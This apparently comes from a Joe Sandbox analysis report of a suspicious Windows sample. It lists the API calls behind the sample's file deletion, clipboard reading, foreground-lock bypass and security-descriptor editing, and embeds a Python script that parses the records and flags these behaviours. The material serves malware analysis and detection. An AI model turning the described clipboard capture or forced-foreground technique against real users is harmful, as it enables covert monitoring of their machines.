                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 4125248594-2988720461
                                                              • Opcode ID: 4070908aa53998533c0cb39019c85a54bff690cfce4651167c1fddd756c225b5
                                                              • Instruction ID: 7ae74806a99218b6052c0c31c6cc3c1f40d1aa60dae5c05cb21d3a78c0cdb84b
                                                              • Opcode Fuzzy Hash: 4070908aa53998533c0cb39019c85a54bff690cfce4651167c1fddd756c225b5
                                                              • Instruction Fuzzy Hash: B531A571A40218BBEB205F75AC4AF7F3EACEB44B50F214055FA05EB1D0DAB55D00AAA0
                                                              APIs
                                                                • Part of subcall function 00AF6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AF5FA6,?), ref: 00AF6ED8
                                                                • Part of subcall function 00AF6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AF5FA6,?), ref: 00AF6EF1
                                                                • Part of subcall function 00AF725E: __wsplitpath.LIBCMT ref: 00AF727B
                                                                • Part of subcall function 00AF725E: __wsplitpath.LIBCMT ref: 00AF728E
                                                                • Part of subcall function 00AF72CB: GetFileAttributesW.KERNEL32(?,00AF6019), ref: 00AF72CC
                                                              • _wcscat.LIBCMT ref: 00AF6149
                                                              • _wcscat.LIBCMT ref: 00AF6167
                                                              • __wsplitpath.LIBCMT ref: 00AF618E
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00AF61A4
                                                              • _wcscpy.LIBCMT ref: 00AF6209
                                                              • _wcscat.LIBCMT ref: 00AF621C
                                                              • _wcscat.LIBCMT ref: 00AF622F
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00AF625D
                                                              • DeleteFileW.KERNEL32(?), ref: 00AF626E
                                                              • MoveFileW.KERNEL32(?,?), ref: 00AF6289
                                                              • MoveFileW.KERNEL32(?,?), ref: 00AF6298
                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 00AF62AD
                                                              • DeleteFileW.KERNEL32(?), ref: 00AF62BE
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AF62E1
                                                              • FindClose.KERNEL32(00000000), ref: 00AF62FD
                                                              • FindClose.KERNEL32(00000000), ref: 00AF630B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                              • String ID: \*.*$p1Mw`KNw
                                                              • API String ID: 1917200108-2160596699
                                                              • Opcode ID: ba0e90bf4f39257403e8f9d3a4cf9e0511c09680dba3b2febec0413c34af844c
                                                              • Instruction ID: d6cfd2e7e096cf2c48b4e405a854e42497fcc3a4ecbb3b88a33d3c328dd5de48
                                                              • Opcode Fuzzy Hash: ba0e90bf4f39257403e8f9d3a4cf9e0511c09680dba3b2febec0413c34af844c
                                                              • Instruction Fuzzy Hash: 36510B7290811C6ACB21EBA1DD44EEF77BCAF05300F0905E6F685A3141DE369B898FA4
                                                              APIs
                                                              • OpenClipboard.USER32(00B4DC00), ref: 00B06B36
                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B06B44
                                                              • GetClipboardData.USER32(0000000D), ref: 00B06B4C
                                                              • CloseClipboard.USER32 ref: 00B06B58
                                                              • GlobalLock.KERNEL32(00000000), ref: 00B06B74
                                                              • CloseClipboard.USER32 ref: 00B06B7E
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00B06B93
                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00B06BA0
                                                              • GetClipboardData.USER32(00000001), ref: 00B06BA8
                                                              • GlobalLock.KERNEL32(00000000), ref: 00B06BB5
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00B06BE9
                                                              • CloseClipboard.USER32 ref: 00B06CF6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                              • String ID:
                                                              • API String ID: 3222323430-0
                                                              • Opcode ID: d6e870ade6039482aa0860a2ff61247d9ab261d63b5773a2c344b8d3950747ae
                                                              • Instruction ID: 2ed0919652e7beb5e379ff472ed9a018bef75d7b0cc9701b45103e4b4237107c
                                                              • Opcode Fuzzy Hash: d6e870ade6039482aa0860a2ff61247d9ab261d63b5773a2c344b8d3950747ae
                                                              • Instruction Fuzzy Hash: AC519F71200201ABE310EF65EE86FAE7BE8EF84B10F104569F666D71E1DF70D9158B62
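The API records above are easier to read once the raw argument values are named: 0000000D in GetClipboardData is CF_UNICODETEXT, 00000012 in keybd_event is VK_MENU (Alt), and the AttachThreadInput / keybd_event / SetForegroundWindow run in the Shell_TrayWnd function is the standard way of taking the foreground despite the foreground-lock rule. The Python below is an added example written for this report, not Joe Sandbox code: it parses the bullet lines of an "APIs" record, annotates known Win32 constants, and flags the clipboard-read and forced-foreground sequences. The sample lines are copied from two records above; the constant tables are standard Win32 values; treating 000000F0 / 000000EB in GetWindowLongW as sign-extended imm8 (-16 GWL_STYLE, -21 GWL_USERDATA) is an assumption about how the plugin prints small negative immediates.

```python
"""Parse the bullet lines of a Joe Sandbox 'APIs' record into structured calls,
annotate the Win32 constants that carry meaning and flag two behaviours visible
in this report: a clipboard read and forcing a window to the foreground.
Added example, not Joe Sandbox code. Sample lines are copied from this report;
constant tables are standard Win32 values. Reading 000000F0 / 000000EB as
sign-extended imm8 (-16 / -21) is an assumption about how the plugin prints
small negative immediates."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # set for "Part of subcall function" lines
    notes: List[str] = field(default_factory=list)


CF = {"00000001": "CF_TEXT", "0000000D": "CF_UNICODETEXT"}
VK = {"00000009": "VK_TAB", "00000010": "VK_SHIFT",
      "00000011": "VK_CONTROL", "00000012": "VK_MENU (Alt)"}
# (api, zero-based argument index) -> {raw value as printed: meaning}
CONSTANTS = {
    ("IsClipboardFormatAvailable", 0): CF, ("GetClipboardData", 0): CF,
    ("GetKeyState", 0): VK, ("MapVirtualKeyW", 0): VK, ("keybd_event", 0): VK,
    ("GetWindowLongW", 1): {"000000F0": "GWL_STYLE (-16)", "000000EB": "GWL_USERDATA (-21)"},
    ("ShowWindow", 1): {"00000009": "SW_RESTORE"},
    ("DefDlgProcW", 1): {"0000004E": "WM_NOTIFY"},
    ("AttachThreadInput", 2): {"00000001": "fAttach=TRUE", "00000000": "fAttach=FALSE"},
    ("SendMessageW", 1): {"00000400": "WM_USER", "00001012": "LVM_HITTEST",
                          "0000110A": "TVM_GETNEXTITEM", "0000110B": "TVM_SELECTITEM",
                          "00001111": "TVM_HITTEST"},
}


def parse_record(text: str) -> List[Call]:
    """Return one Call per API bullet line; headings and hash lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m["args"].split(",") if m["args"] else []
        call = Call(m["api"], m["mod"], args, int(m["ref"], 16),
                    int(m["sub"], 16) if m["sub"] else None)
        for idx, raw in enumerate(args):
            name = CONSTANTS.get((call.api, idx), {}).get(raw)
            if name:
                call.notes.append(f"arg{idx}={name}")
        calls.append(call)
    return calls


def reads_clipboard(calls: List[Call]) -> bool:
    """OpenClipboard, GetClipboardData, CloseClipboard in call-site order (own calls only)."""
    want = ["OpenClipboard", "GetClipboardData", "CloseClipboard"]
    pos = 0
    for c in sorted((c for c in calls if c.subcall_of is None), key=lambda c: c.ref):
        if pos < len(want) and c.api == want[pos]:
            pos += 1
    return pos == len(want)


def forces_foreground(calls: List[Call]) -> bool:
    """AttachThreadInput plus a synthetic Alt press (keybd_event VK_MENU) around
    SetForegroundWindow: the usual way to get past the foreground-lock rule."""
    apis = {c.api for c in calls}
    alt = any(c.api == "keybd_event" and c.args[:1] == ["00000012"] for c in calls)
    return {"AttachThreadInput", "SetForegroundWindow"} <= apis and alt


# Sample input: lines copied from two records of this report (each a subset of
# the record's bullet lines).
CLIPBOARD_RECORD = """
• OpenClipboard.USER32(00B4DC00), ref: 00B06B36
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00B06B44
• GetClipboardData.USER32(0000000D), ref: 00B06B4C
• CloseClipboard.USER32 ref: 00B06B58
• GlobalLock.KERNEL32(00000000), ref: 00B06B74
• GlobalUnlock.KERNEL32(00000000), ref: 00B06B93
"""
FOREGROUND_RECORD = """
• GetForegroundWindow.USER32(00000000,00000000), ref: 00ACEB4A
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B23AEA
• IsIconic.USER32(000000FF), ref: 00B23AF3
• ShowWindow.USER32(000000FF,00000009), ref: 00B23B00
• SetForegroundWindow.USER32(000000FF), ref: 00B23B0A
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B23B44
• keybd_event.USER32(00000012,00000000), ref: 00B23B77
• AttachThreadInput.USER32(000000FF,?,00000000), ref: 00B23BCD
"""

if __name__ == "__main__":
    for name, rec in (("clipboard", CLIPBOARD_RECORD), ("foreground", FOREGROUND_RECORD)):
        calls = parse_record(rec)
        print(name, len(calls), "calls; clipboard:", reads_clipboard(calls),
              "forced foreground:", forces_foreground(calls),
              [f"{c.api} {' '.join(c.notes)}" for c in calls if c.notes])
```

Run it directly to print the summary for the two embedded records; any other record's bullet lines can be passed to parse_record as copied, including the indented "Part of subcall function" lines, which are kept but excluded from the ordered clipboard check because their addresses belong to a different function.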
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00AFF62B
                                                              • FindClose.KERNEL32(00000000), ref: 00AFF67F
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AFF6A4
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AFF6BB
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00AFF6E2
                                                              • __swprintf.LIBCMT ref: 00AFF72E
                                                              • __swprintf.LIBCMT ref: 00AFF767
                                                              • __swprintf.LIBCMT ref: 00AFF7BB
                                                                • Part of subcall function 00AD172B: __woutput_l.LIBCMT ref: 00AD1784
                                                              • __swprintf.LIBCMT ref: 00AFF809
                                                              • __swprintf.LIBCMT ref: 00AFF858
                                                              • __swprintf.LIBCMT ref: 00AFF8A7
                                                              • __swprintf.LIBCMT ref: 00AFF8F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                              • API String ID: 835046349-2428617273
                                                              • Opcode ID: 1d6bbd473a6e4b7f12f923ade3a2ec95c49333885aad1d01a9feee4f4ff0dba7
                                                              • Instruction ID: eb04d161dded74d5ee5129382987cd16cac84e491228eab4b9f689c1a892ac84
                                                              • Opcode Fuzzy Hash: 1d6bbd473a6e4b7f12f923ade3a2ec95c49333885aad1d01a9feee4f4ff0dba7
                                                              • Instruction Fuzzy Hash: 3DA1F0B2508344ABC310EBA4C985EAFB7ECBF98704F44092EF595C7152EB34D949CB62
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00B01B50
                                                              • _wcscmp.LIBCMT ref: 00B01B65
                                                              • _wcscmp.LIBCMT ref: 00B01B7C
                                                              • GetFileAttributesW.KERNEL32(?), ref: 00B01B8E
                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00B01BA8
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00B01BC0
                                                              • FindClose.KERNEL32(00000000), ref: 00B01BCB
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00B01BE7
                                                              • _wcscmp.LIBCMT ref: 00B01C0E
                                                              • _wcscmp.LIBCMT ref: 00B01C25
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B01C37
                                                              • SetCurrentDirectoryW.KERNEL32(00B639FC), ref: 00B01C55
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B01C5F
                                                              • FindClose.KERNEL32(00000000), ref: 00B01C6C
                                                              • FindClose.KERNEL32(00000000), ref: 00B01C7C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                              • String ID: *.*
                                                              • API String ID: 1803514871-438819550
                                                              • Opcode ID: 1b5c67862b83181a464e883da2833139bb1fb9661a4ed39628223130baf7f757
                                                              • Instruction ID: 0b233c037282f1d0db94f8a3afd9a9aa6098d9fe28a9ec5bec1f767e43b58be8
                                                              • Opcode Fuzzy Hash: 1b5c67862b83181a464e883da2833139bb1fb9661a4ed39628223130baf7f757
                                                              • Instruction Fuzzy Hash: CF31A3325006196BDB24ABB8EC49ADE7BECDF05320F1045D6E915E31D0EB74DE858A64
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00B01CAB
                                                              • _wcscmp.LIBCMT ref: 00B01CC0
                                                              • _wcscmp.LIBCMT ref: 00B01CD7
                                                                • Part of subcall function 00AF6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AF6BEF
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00B01D06
                                                              • FindClose.KERNEL32(00000000), ref: 00B01D11
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00B01D2D
                                                              • _wcscmp.LIBCMT ref: 00B01D54
                                                              • _wcscmp.LIBCMT ref: 00B01D6B
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B01D7D
                                                              • SetCurrentDirectoryW.KERNEL32(00B639FC), ref: 00B01D9B
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B01DA5
                                                              • FindClose.KERNEL32(00000000), ref: 00B01DB2
                                                              • FindClose.KERNEL32(00000000), ref: 00B01DC2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                              • String ID: *.*
                                                              • API String ID: 1824444939-438819550
                                                              • Opcode ID: b9a127fa1b8c35c02c15119664d24629da03f3a2f14b8bbc32390b7b0d8d8a7a
                                                              • Instruction ID: 010d89d293182b58110560707aa586477fb4e6edb919a10a730e46f88779bb91
                                                              • Opcode Fuzzy Hash: b9a127fa1b8c35c02c15119664d24629da03f3a2f14b8bbc32390b7b0d8d8a7a
                                                              • Instruction Fuzzy Hash: EC31E53150061A7BDF14AFA8EC49ADE3BEDDF05320F104AE5E801A31E0DB74DE458A54
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?), ref: 00B009DF
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B009EF
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B009FB
                                                              • __wsplitpath.LIBCMT ref: 00B00A59
                                                              • _wcscat.LIBCMT ref: 00B00A71
                                                              • _wcscat.LIBCMT ref: 00B00A83
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B00A98
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B00AAC
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B00ADE
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B00AFF
                                                              • _wcscpy.LIBCMT ref: 00B00B0B
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B00B4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                              • String ID: *.*
                                                              • API String ID: 3566783562-438819550
                                                              • Opcode ID: bd457f9890d1bafb9674bdedda1074d1a4a8733a3c7bc16bee51699292db9b9c
                                                              • Instruction ID: 277ed5e044169f5b707945edba72aa7d0757df0dbf4017ce3a8a0a4a686f9cc9
                                                              • Opcode Fuzzy Hash: bd457f9890d1bafb9674bdedda1074d1a4a8733a3c7bc16bee51699292db9b9c
                                                              • Instruction Fuzzy Hash: F5616A725183059FD710EF64C980AAEB7E8FF89314F04495EF989C7252DB31E945CB92
                                                              APIs
                                                                • Part of subcall function 00AEABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00AEABD7
                                                                • Part of subcall function 00AEABBB: GetLastError.KERNEL32(?,00AEA69F,?,?,?), ref: 00AEABE1
                                                                • Part of subcall function 00AEABBB: GetProcessHeap.KERNEL32(00000008,?,?,00AEA69F,?,?,?), ref: 00AEABF0
                                                                • Part of subcall function 00AEABBB: HeapAlloc.KERNEL32(00000000,?,00AEA69F,?,?,?), ref: 00AEABF7
                                                                • Part of subcall function 00AEABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00AEAC0E
                                                                • Part of subcall function 00AEAC56: GetProcessHeap.KERNEL32(00000008,00AEA6B5,00000000,00000000,?,00AEA6B5,?), ref: 00AEAC62
                                                                • Part of subcall function 00AEAC56: HeapAlloc.KERNEL32(00000000,?,00AEA6B5,?), ref: 00AEAC69
                                                                • Part of subcall function 00AEAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AEA6B5,?), ref: 00AEAC7A
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AEA6D0
                                                              • _memset.LIBCMT ref: 00AEA6E5
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AEA704
                                                              • GetLengthSid.ADVAPI32(?), ref: 00AEA715
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00AEA752
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AEA76E
                                                              • GetLengthSid.ADVAPI32(?), ref: 00AEA78B
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AEA79A
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00AEA7A1
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AEA7C2
                                                              • CopySid.ADVAPI32(00000000), ref: 00AEA7C9
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AEA7FA
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AEA820
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AEA834
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: 590f976b6576af2236153e04a0a5339e64ffdc61be1027e56d906601db6ec8ce
                                                              • Instruction ID: e60f4a74cc085ac44a7500e61d988bdefb90ab29085d51e5e84811cc19a64a10
                                                              • Opcode Fuzzy Hash: 590f976b6576af2236153e04a0a5339e64ffdc61be1027e56d906601db6ec8ce
                                                              • Instruction Fuzzy Hash: 10514B71900249ABDF14DFA6DC45AEEBBB9FF14700F148129F911AB290DB34AE05CB61
                                                              APIs
                                                                • Part of subcall function 00AF6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AF5FA6,?), ref: 00AF6ED8
                                                                • Part of subcall function 00AF72CB: GetFileAttributesW.KERNEL32(?,00AF6019), ref: 00AF72CC
                                                              • _wcscat.LIBCMT ref: 00AF6441
                                                              • __wsplitpath.LIBCMT ref: 00AF645F
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00AF6474
                                                              • _wcscpy.LIBCMT ref: 00AF64A3
                                                              • _wcscat.LIBCMT ref: 00AF64B8
                                                              • _wcscat.LIBCMT ref: 00AF64CA
                                                              • DeleteFileW.KERNEL32(?), ref: 00AF64DA
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AF64EB
                                                              • FindClose.KERNEL32(00000000), ref: 00AF6506
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                              • String ID: \*.*$p1Mw`KNw
                                                              • API String ID: 2643075503-2160596699
                                                              • Opcode ID: 6f621f71748577ec9f7a52ece0c1f914ed3bb16557cc435f268416bea8846ad0
                                                              • Instruction ID: 80de3381a542ede4f7c3464e76cce051640ebc614f63943989db59386337922b
                                                              • Opcode Fuzzy Hash: 6f621f71748577ec9f7a52ece0c1f914ed3bb16557cc435f268416bea8846ad0
                                                              • Instruction Fuzzy Hash: 273150B2408388AAC721EBE48985EEFB7DCAF55314F44092AF6D9C3141EA35D50987A7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                              • API String ID: 0-4052911093
                                                              • Opcode ID: bdaaca2449614443e46189adb4d0ea0719a733be0165a920919c2f1591f15c56
                                                              • Instruction ID: cec4f3eff3c1c0c94be15f3045e0bf501ea7fee993747042cd51161642bd7ad8
                                                              • Opcode Fuzzy Hash: bdaaca2449614443e46189adb4d0ea0719a733be0165a920919c2f1591f15c56
                                                              • Instruction Fuzzy Hash: 31726F71E042299BDB24CF58D8817EEB7F5FF48710F2481AAE815EB281DB749E41DB90
                                                              APIs
                                                                • Part of subcall function 00B13C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B12BB5,?,?), ref: 00B13C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B1328E
